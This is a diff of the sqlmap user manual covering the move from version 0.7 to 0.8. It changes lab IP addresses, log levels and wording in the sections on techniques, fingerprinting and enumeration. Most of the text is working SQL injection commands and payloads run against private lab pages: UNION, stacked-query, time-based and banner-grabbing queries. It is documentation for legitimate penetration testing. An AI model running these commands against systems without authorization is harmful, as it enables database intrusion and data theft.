      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 \
         -p "id" --prefix "'" --postfix "AND 'test'='test"
       
       [...]
      @@ -1647,11 +1848,11 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id
       GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
       %28%27test%27=%27test HTTP/1.1
       Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
      -Host: 192.168.1.121:80
      +Host: 172.16.213.131
       Accept-language: en-us,en;q=0.5
       Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
       image/png,*/*;q=0.5
      -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
      +User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
       Connection: close
       [...]
       [hh:mm:17] [INFO] GET parameter 'id' is custom injectable 
      @@ -1692,7 +1893,7 @@ the real world application it is necessary to provide it.

      Page comparison

      -

      Options: --string and --regexp

      +

      Options: --string and --regexp

      By default the distinction of a True query by a False one (basic concept for Inferential blind SQL injection attacks) is done comparing injected @@ -1720,15 +1921,15 @@ every second due to a call to PHP function time():

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_refresh.php?id=1" \
         -v 5
       
       [...]
       [hh:mm:50] [INFO] testing if the url is stable, wait a few seconds
       [hh:mm:50] [TRAFFIC OUT] HTTP request:
       GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
      -Host: 192.168.1.121:80
      -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
      +Host: 172.16.213.131
      +User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
       Connection: close
       
       [hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200):
      @@ -1749,8 +1950,8 @@ Content-Type: text/html
       
       [hh:mm:51] [TRAFFIC OUT] HTTP request:
       GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
      -Host: 192.168.1.121:80
      -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
      +Host: 172.16.213.131
      +User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
       Connection: close
       
       [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
      @@ -1771,8 +1972,8 @@ Content-Type: text/html
       
       [hh:mm:51] [TRAFFIC OUT] HTTP request:
       GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
      -Host: 192.168.1.121:80
      -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
      +Host: 172.16.213.131
      +User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
       Connection: close
       
       [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
      @@ -1814,7 +2015,7 @@ every second due to a call to PHP function time():

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_refresh.php?id=1" \
         --string "luther" -v 1
       
       [hh:mm:22] [INFO] testing connection to the target url
      @@ -1842,7 +2043,7 @@ every second due to a call to PHP function time():

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_refresh.php?id=1" \
         --regexp "<td>lu[\w][\w]er" -v 1
       
       [hh:mm:22] [INFO] testing connection to the target url
      @@ -1867,16 +2068,16 @@ URL page content
       

      As you can see, when one of these options is specified, sqlmap skips the URL stability test.

      -

      Consider one of these options a must when you are dealing with a page -which content that changes itself at each refresh without modifying the +

      Consider one of these options a MUST when dealing with a page +with content that changes itself at each refresh without modifying the user's input.

      Exclude specific page content

      -

      Options: --excl-str and --excl-reg

      +

      Options: --excl-str and --excl-reg

      -

      Another way to get around the dynamicity issue above explained is to exclude +

      Another way to get around the dynamicity issue explained above is to exclude the dynamic part from the page content before processing it.

      As you see in the above example the number after Dynamic content: @@ -1887,7 +2088,7 @@ not injected page.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_refresh.php?id=1" \
         --excl-reg "Dynamic content: ([\d]+)"
       
       [hh:mm:22] [INFO] testing connection to the target url
      @@ -1914,9 +2115,13 @@ stability test.

      5.5 Techniques

      +

      These options can be used to test for specific SQL injection technique or +to use one of them to exploit the affected parameter(s) rather than using +the default blind SQL injection technique.

      +

      Test for stacked queries (multiple statements) support

      -

      Option: --stacked-test

      +

      Option: --stacked-test

      It is possible to test if the web application technology supports stacked queries, multiple statements, on the injectable @@ -1926,7 +2131,7 @@ parameter.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" \
         --stacked-test -v 1
       
       [...]
      @@ -1950,7 +2155,7 @@ where PHP does not support them on MySQL, it does on PostgreSQL.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
         --stacked-test -v 1
       
       [...]
      @@ -1967,7 +2172,7 @@ stacked queries support:    'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
       

      -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
      +$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" \
         --stacked-test -v 1
       
       [...]
      @@ -1983,7 +2188,7 @@ stacked queries support:    'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'=
       
       

      Test for time based blind SQL injection

      -

      Options: --time-test and --time-sec

      +

      Options: --time-test and --time-sec

      It is possible to test if the target URL is affected by a time based blind SQL injection vulnerability.

      @@ -1992,7 +2197,7 @@ blind SQL injection vulnerability.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" \
         --time-test -v 1
       
       [...]
      @@ -2011,7 +2216,7 @@ time based blind sql injection payload:    'id=1 AND SLEEP(5) AND 5249=5249'
       

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
         --time-test -v 1
       
       [...]
      @@ -2034,7 +2239,7 @@ time based blind sql injection payload:    'id=1; SELECT pg_sleep(5);-- AND 9644
       

      -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
      +$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" \
         --time-test -v 1
       
       [...]
      @@ -2055,13 +2260,13 @@ time based blind sql injection payload:    'name=luther'; WAITFOR DELAY '0:0:5';
       

      It is also possible to set the seconds to delay the response by providing -the --time-sec option followed by an integer. By default it delays -five seconds.

      +the --time-sec option followed by an integer. By default delay +is set to five seconds.

      Test for UNION query SQL injection

      -

      Options: --union-test and --union-tech

      +

      Options: --union-test and --union-tech

      It is possible to test if the target URL is affected by a UNION query (inband) SQL injection vulnerability. @@ -2072,7 +2277,7 @@ technique.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" \
         --union-test -v 1
       
       [...]
      @@ -2081,7 +2286,7 @@ back-end DBMS:  Oracle
       [hh:mm:27] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
       technique
       [hh:mm:27] [INFO] the target url could be affected by an inband sql injection vulnerability
      -valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
      +valid union:    'http://172.16.213.131/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
       NULL, NULL, NULL FROM DUAL-- AND 6558=6558'
       
      @@ -2090,7 +2295,7 @@ NULL, NULL, NULL FROM DUAL-- AND 6558=6558'

      By default sqlmap uses the NULL bruteforcing technique to detect the number of columns within the original SELECT statement. It is also possible to change it to ORDER BY clause -bruteforcing with the --union-tech option.

      +bruteforcing
      with the --union-tech option.

      Further details on these techniques can be found here.

      @@ -2099,7 +2304,7 @@ bruteforcing with the --union-tech option.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_str.php?id=1" \
         --union-test --union-tech orderby -v 1
       
       [...]
      @@ -2108,7 +2313,7 @@ back-end DBMS: PostgreSQL
       [hh:mm:51] [INFO] testing inband sql injection on parameter 'id' with ORDER BY clause 
       bruteforcing technique
       [hh:mm:51] [INFO] the target url could be affected by an inband sql injection vulnerability
      -valid union:    'http://192.168.1.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND 
      +valid union:    'http://172.16.213.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND 
       1262=1262'
       
      @@ -2120,20 +2325,20 @@ In case a case it is strongly recommended to use this technique which saves a lot of time.

      It is strongly recommended to run at least once sqlmap with the ---union-test option to test if the affected parameter is used +--union-test option to test if the affected parameter is used within a for cycle, or similar, and in case use ---union-use option to exploit this vulnerability because it +--union-use option to exploit this vulnerability because it saves a lot of time and it does not weight down the web server log file with hundreds of HTTP requests.

      Use the UNION query SQL injection

      -

      Option: --union-use

      +

      Option: --union-use

      -

      Providing the --union-use parameter, sqlmap will first test if +

      Providing the --union-use parameter, sqlmap will first test if the target URL is affected by an inband SQL injection -(--union-test) vulnerability then, in case it seems to be +(--union-test) vulnerability then, in case it seems to be vulnerable, it will confirm that the parameter is affected by a Full UNION query SQL injection and use this technique to go ahead with the exploiting. @@ -2148,7 +2353,7 @@ ahead.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" -v 2 \
         --union-use --banner
       
       [...]
      @@ -2161,10 +2366,10 @@ technique
       [hh:mm:42] [INFO] confirming full inband sql injection on parameter 'id'
       [hh:mm:42] [INFO] the target url is affected by an exploitable full inband sql injection 
       vulnerability
      -[hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
      +[hh:mm:42] [DEBUG] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
       CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
       CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
      -[hh:mm:42] [INFO] performed 3 queries in 0 seconds
      +[hh:mm:42] [DEBUG] performed 3 queries in 0 seconds
       banner:
       ---
       Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
      @@ -2184,13 +2389,13 @@ vulnerabilities.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 5 \
         --union-use --current-user
       
       [...]
       [hh:mm:29] [INFO] the target url is affected by an exploitable full inband sql 
       injection vulnerability
      -[hh:mm:29] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(112,110,121,77,88,86),
      +[hh:mm:29] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(112,110,121,77,88,86),
       IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32)),CHAR(72,89,75,77,121,103)), 
       NULL# AND 8032=8032
       [hh:mm:29] [TRAFFIC OUT] HTTP request:
      @@ -2199,11 +2404,11 @@ GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28C
       %29%2C%20CHAR%2832%29%29%2CCHAR%2872%2C89%2C75%2C77%2C121%2C103%29%29%2C%20NULL%23%20AND
       %208032=8032 HTTP/1.1
       Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
      -Host: 192.168.1.121:80
      +Host: 172.16.213.131
       Accept-language: en-us,en;q=0.5
       Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
       image/png,*/*;q=0.5
      -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
      +User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
       Connection: close
       
       [hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200):
      @@ -2223,7 +2428,7 @@ Content-Type: text/html
       </table>
       </body></html>
       
      -[hh:mm:29] [INFO] performed 3 queries in 0 seconds
      +[hh:mm:29] [DEBUG] performed 3 queries in 0 seconds
       current user:    'testuser@localhost'
       
      @@ -2242,7 +2447,7 @@ entry is displayed in the page content.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_partialunion.php?id=1" -v 2 \
         --union-use --dbs
       
       [...]
      @@ -2258,43 +2463,43 @@ injection vulnerability
       [hh:mm:56] [INFO] confirming partial inband sql injection on parameter 'id'
       [hh:mm:56] [INFO] the target url is affected by an exploitable partial inband sql injection 
       vulnerability
      -[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),
      +[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),
       IFNULL(CAST(COUNT(schema_name) AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL 
       FROM information_schema.SCHEMATA# AND 1062=1062
      -[hh:mm:56] [INFO] performed 6 queries in 0 seconds
      +[hh:mm:56] [DEBUG] performed 6 queries in 0 seconds
       [hh:mm:56] [INFO] the SQL query provided returns 4 entries
      -[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
      +[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
       CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
       information_schema.SCHEMATA LIMIT 0, 1# AND 1421=1421
      -[hh:mm:56] [INFO] performed 7 queries in 0 seconds
      -[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
      +[hh:mm:56] [DEBUG] performed 7 queries in 0 seconds
      +[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
       CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
       information_schema.SCHEMATA LIMIT 1, 1# AND 9553=9553
      -[hh:mm:56] [INFO] performed 8 queries in 0 seconds
      -[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
      +[hh:mm:56] [DEBUG] performed 8 queries in 0 seconds
      +[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
       CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
       information_schema.SCHEMATA LIMIT 2, 1# AND 6805=6805
      -[hh:mm:56] [INFO] performed 9 queries in 0 seconds
      -[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
      +[hh:mm:56] [DEBUG] performed 9 queries in 0 seconds
      +[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
       CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
       information_schema.SCHEMATA LIMIT 3, 1# AND 739=739
      -[hh:mm:56] [INFO] performed 10 queries in 0 seconds
      +[hh:mm:56] [DEBUG] performed 10 queries in 0 seconds
       available databases [4]:
       [*] information_schema
       [*] mysql
       [*] privatedb
      -[*] test
      +[*] testdb
       

      As you can see, sqlmap identified that the parameter is affected by a -partial inband SQL injection, consequently counted the number of query -output entries and retrieved once per time by forcing the parameter +partial inband SQL injection. Consequently, it counted the number of query +output entries and retrieved them once per time. It forces the parameter (id) value 1 to its negative value -1 so that -it does not returns, presumibly, any output leaving our own UNION ALL -SELECT statement to produce one entry at a time and display it in the -page content.

      +it does not return, presumibly, any output. That leaves our own UNION ALL +SELECT statement to produce one entry at a time and display only it in +the page content.

      5.6 Fingerprint @@ -2302,7 +2507,7 @@ page content.

      Extensive database management system fingerprint

      -

      Options: -f or --fingerprint

      +

      Options: -f or --fingerprint

      By default the web application's back-end database management system fingerprint is performed requesting a database specific function which @@ -2319,14 +2524,12 @@ specific syntax within the limits of the database architecture.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1
       
       [...]
       [hh:mm:17] [INFO] testing MySQL
       [hh:mm:17] [INFO] confirming MySQL
      -[hh:mm:17] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
       [hh:mm:17] [INFO] retrieved: 5
      -[hh:mm:17] [INFO] performed 13 queries in 0 seconds
       [hh:mm:17] [INFO] the back-end DBMS is MySQL
       web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
       web application technology: PHP 5.2.6, Apache 2.2.9
      @@ -2340,30 +2543,22 @@ system and the web application technology by parsing some HTTP response headers.
       
       

      If you want to perform an extensive database management system fingerprint based on various techniques like specific SQL dialects and inband error -messages, you can provide the --fingerprint option.

      +messages, you can provide the --fingerprint option.

      Example on a MySQL 5.0.67 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 -f
       
       [...]
       [hh:mm:49] [INFO] testing MySQL
       [hh:mm:49] [INFO] confirming MySQL
      -[hh:mm:49] [INFO] query: SELECT 3 FROM information_schema.TABLES LIMIT 0, 1
       [hh:mm:49] [INFO] retrieved: 3
      -[hh:mm:49] [INFO] performed 13 queries in 0 seconds
       [hh:mm:49] [INFO] the back-end DBMS is MySQL
      -[hh:mm:49] [INFO] query: SELECT 3 FROM information_schema.PARAMETERS LIMIT 0, 1
       [hh:mm:49] [INFO] retrieved: 
      -[hh:mm:49] [INFO] performed 6 queries in 0 seconds
      -[hh:mm:49] [INFO] query: MID(@@table_open_cache, 1, 1)
       [hh:mm:49] [INFO] retrieved: 
      -[hh:mm:49] [INFO] performed 6 queries in 0 seconds
      -[hh:mm:49] [INFO] query: MID(@@hostname, 1, 1)
       [hh:mm:49] [INFO] retrieved: t
      -[hh:mm:49] [INFO] performed 13 queries in 0 seconds
       [hh:mm:49] [INFO] executing MySQL comment injection fingerprint
       web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
       web application technology: PHP 5.2.6, Apache 2.2.9
      @@ -2378,17 +2573,14 @@ back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
       

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -v 1 -f
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" -v 1 -f
       
       [...]
       [hh:mm:38] [WARNING] the back-end DMBS is not MySQL
       [hh:mm:38] [INFO] testing Oracle
       [hh:mm:38] [INFO] confirming Oracle
       [hh:mm:38] [INFO] the back-end DBMS is Oracle
      -[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION 
      -WHERE ROWNUM=1
       [hh:mm:38] [INFO] retrieved: 10
      -[hh:mm:38] [INFO] performed 20 queries in 0 seconds
       web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
       web application technology: PHP 5.2.6, Apache 2.2.9
       back-end DBMS: active fingerprint: Oracle 10g
      @@ -2401,19 +2593,15 @@ back-end DBMS: active fingerprint: Oracle 10g
       

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -f
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -v 1 -f
       
       [...]
       [hh:mm:14] [WARNING] the back-end DMBS is not Oracle
       [hh:mm:14] [INFO] testing PostgreSQL
       [hh:mm:14] [INFO] confirming PostgreSQL
       [hh:mm:14] [INFO] the back-end DBMS is PostgreSQL
      -[hh:mm:14] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)
       [hh:mm:14] [INFO] retrieved: 2
      -[hh:mm:14] [INFO] performed 13 queries in 0 seconds
      -[hh:mm:14] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)
       [hh:mm:14] [INFO] retrieved: 
      -[hh:mm:14] [INFO] performed 6 queries in 0 seconds
       web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
       web application technology: PHP 5.2.6, Apache 2.2.9
       back-end DBMS: active fingerprint: PostgreSQL >= 8.3.0
      @@ -2422,15 +2610,15 @@ back-end DBMS: active fingerprint: PostgreSQL >= 8.3.0
       

      -

      As you can see from this last example, sqlmap first tested for MySQL, +

      As you can see from the last example, sqlmap first tested for MySQL, then for Oracle, then for PostgreSQL since the user did not forced the -back-end database management system name with option --dbms.

      +back-end database management system name with option --dbms.

      Example on a Microsoft SQL Server 2000 Service Pack 0 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" -v 1 -f
       
       [...]
       [hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
      @@ -2449,7 +2637,7 @@ back-end DBMS:  active fingerprint: Microsoft SQL Server 2000
       

      -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
      +$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 1 -f
       
       [...]
       [hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
      @@ -2465,33 +2653,33 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2005
       

      If you want an even more accurate result, based also on banner parsing, -you can also provide the -b or --banner option.

      +you can also provide the -b or --banner option.

      Example on a MySQL 5.0.67 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f -b
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 2 -f -b
       
       [...]
       [hh:mm:04] [INFO] testing MySQL
       [hh:mm:04] [INFO] confirming MySQL
      -[hh:mm:04] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
      +[hh:mm:04] [DEBUG] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
       [hh:mm:04] [INFO] retrieved: 0
      -[hh:mm:04] [INFO] performed 13 queries in 0 seconds
      +[hh:mm:04] [DEBUG] performed 13 queries in 0 seconds
       [hh:mm:04] [INFO] the back-end DBMS is MySQL
      -[hh:mm:04] [INFO] query: VERSION()
      +[hh:mm:04] [DEBUG] query: VERSION()
       [hh:mm:04] [INFO] retrieved: 5.0.67-0ubuntu6
      -[hh:mm:05] [INFO] performed 111 queries in 1 seconds
      -[hh:mm:05] [INFO] query: SELECT 0 FROM information_schema.PARAMETERS LIMIT 0, 1
      +[hh:mm:05] [DEBUG] performed 111 queries in 1 seconds
      +[hh:mm:05] [DEBUG] query: SELECT 0 FROM information_schema.PARAMETERS LIMIT 0, 1
       [hh:mm:05] [INFO] retrieved: 
      -[hh:mm:05] [INFO] performed 6 queries in 0 seconds
      -[hh:mm:05] [INFO] query: MID(@@table_open_cache, 1, 1)
      +[hh:mm:05] [DEBUG] performed 6 queries in 0 seconds
      +[hh:mm:05] [DEBUG] query: MID(@@table_open_cache, 1, 1)
       [hh:mm:05] [INFO] retrieved: 
      -[hh:mm:05] [INFO] performed 6 queries in 0 seconds
      -[hh:mm:05] [INFO] query: MID(@@hostname, 1, 1)
      +[hh:mm:05] [DEBUG] performed 6 queries in 0 seconds
      +[hh:mm:05] [DEBUG] query: MID(@@hostname, 1, 1)
       [hh:mm:05] [INFO] retrieved: t
      -[hh:mm:06] [INFO] performed 13 queries in 0 seconds
      +[hh:mm:06] [DEBUG] performed 13 queries in 0 seconds
       [hh:mm:06] [INFO] executing MySQL comment injection fingerprint
       web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
       web application technology: PHP 5.2.6, Apache 2.2.9
      @@ -2505,28 +2693,28 @@ back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
       

      -

      As you can see, sqlmap was able to fingerprint also the back-end DBMS +

      As you can see, sqlmap was also able to fingerprint the back-end DBMS operating system by parsing the DBMS banner value.

      Example on a Microsoft SQL Server 2000 Service Pack 0 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f -b
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" -v 2 -f -b
       
       [...]
       [hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
       [hh:mm:03] [INFO] testing Microsoft SQL Server
       [hh:mm:03] [INFO] confirming Microsoft SQL Server
       [hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
      -[hh:mm:03] [INFO] performed 13 queries in 0 seconds
      -[hh:mm:03] [INFO] query: @@VERSION
      +[hh:mm:03] [DEBUG] performed 13 queries in 0 seconds
      +[hh:mm:03] [DEBUG] query: @@VERSION
       [hh:mm:03] [INFO] retrieved: Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
               Aug  6 2000 00:57:48 
               Copyright (c) 1988-2000 Microsoft Corporation
               Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
       
      -[hh:mm:08] [INFO] performed 1308 queries in 4 seconds
      +[hh:mm:08] [DEBUG] performed 1308 queries in 4 seconds
       web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
       web application technology: PHP 5.2.6, Apache 2.2.9
       back-end DBMS operating system: Windows 2000 Service Pack 4
      @@ -2543,20 +2731,20 @@ back-end DBMS:  active fingerprint: Microsoft SQL Server 2000
       

      -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
      +$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 2 -f -b
       
       [...]
       [hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
       [hh:mm:03] [INFO] testing Microsoft SQL Server
       [hh:mm:03] [INFO] confirming Microsoft SQL Server
       [hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
      -[hh:mm:03] [INFO] query: @@VERSION
      +[hh:mm:03] [DEBUG] query: @@VERSION
       [hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
               Oct 14 2005 00:33:37 
               Copyright (c) 1988-2005 Microsoft Corporation
               Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
       
      -[hh:mm:15] [INFO] performed 1343 queries in 11 seconds
      +[hh:mm:15] [DEBUG] performed 1343 queries in 11 seconds
       web server operating system: Windows 2003 or 2000
       web application technology: ASP.NET, Microsoft IIS 6.0, ASP
       back-end DBMS operating system: Windows 2003 Service Pack 1
      @@ -2579,22 +2767,27 @@ parsing library that fetches data from Chip Andrews'
       

      5.7 Enumeration

      +

      These options can be used to enumerate the back-end database management +system information, structure and data contained in the tables. Moreover +you can run your own SQL statements.

      + +

      Banner

      -

      Option: -b or --banner

      +

      Option: -b or --banner

      -

      Most of the modern database management systems have a function or an -environment variable which returns details on the database managemet -system version. Sometimes also the operating system where the daemon has -been compiled on, the operating system architecture, its service pack. -Usually this function is version() or the @@version -environment variable.

      +

      Most of the modern database management systems have a function and/or +an environment variable which returns details on the database management +system version. Also, sometimes it returns the operating system version +where the daemon has been compiled on, the operating system architecture, +and its service pack. Usually the function is version() and the +environment variable @@version.

      Example on a MySQL 5.0.67 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -b -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -b -v 0
       
       banner:    '5.0.67-0ubuntu6'
       
      @@ -2605,7 +2798,7 @@ banner: '5.0.67-0ubuntu6'

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b -v 0
       
       banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
       (Ubuntu 4.3.2-1ubuntu11) 4.3.2'
